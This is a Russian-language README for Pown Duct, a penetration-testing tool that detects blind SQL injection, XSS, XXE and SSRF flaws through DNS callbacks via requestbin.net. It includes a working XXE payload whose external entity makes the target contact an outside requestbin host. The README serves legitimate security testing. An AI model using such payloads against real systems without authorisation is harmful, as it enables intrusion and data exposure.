
Необходимый инструмент для поиска слепых инъекционных атак.
Основное средство для обнаружения слепых инъекционных атак с использованием DNS-сайд-каналов.
Этот инструмент является частью инициативы с открытым исходным кодом secapps.com.
___ ___ ___ _ ___ ___ ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com
NB: Этот инструмент использует преимущества сервиса http://requestbin.net. В будущих версиях будет использоваться специальная, собранная по индивидуальному заказу инфраструктура.
Этот инструмент предназначен для использования в составе Pown.js, но его можно вызывать отдельно как самостоятельный инструмент.
Установите Pown как обычно:
$ npm install -g pown@latest
Запустите напрямую из Pown:
$ pown duct
Или установите этот модуль локально из корня вашего проекта:
$ npm install @pown/duct --save
После этого запустите cli pown:
$ ./node_modules/.bin/pown-cli duct
Вы также можете использовать глобальный pown для локального вызова инструмента:
$ POWN_ROOT=. pown duct
pown duct <command>
Side-channel attack enabler
Commands:
pown duct dns DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
pown duct dnspown duct dns
DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
--channel Restore channel [string]
--output Output format [string] [choices: "string", "hexdump", "json"] [default: "string"]
Бывают случаи, когда нам необходимо выполнить атаку, такую как SQL-инъекция, XSS, XXE или SSRF, но целевое приложение не дает никаких признаков уязвимости. Один из способов убедиться в наличии уязвимости — попытаться внедрить допустимый вектор атаки, который заставляет DNS-резольвер запрашивать управляемый домен. Если разрешение прошло успешно, атака считается успешной.
ПРИМЕЧАНИЕ: Возможно, вы знакомы с Burp Collaborator, который предоставляет аналогичный сервис для клиентов.
Во-первых, нам нужно одноразовое DNS-имя для разрешения:
$ pown duct dns
screenshot
Используя предоставленный DNS, составьте свою нагрузку. Например, следующий код может вызвать разрешение DNS, если присутствует уязвимость XXE.
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>
Если атака прошла успешно, мы получим сообщение в терминале.
screenshot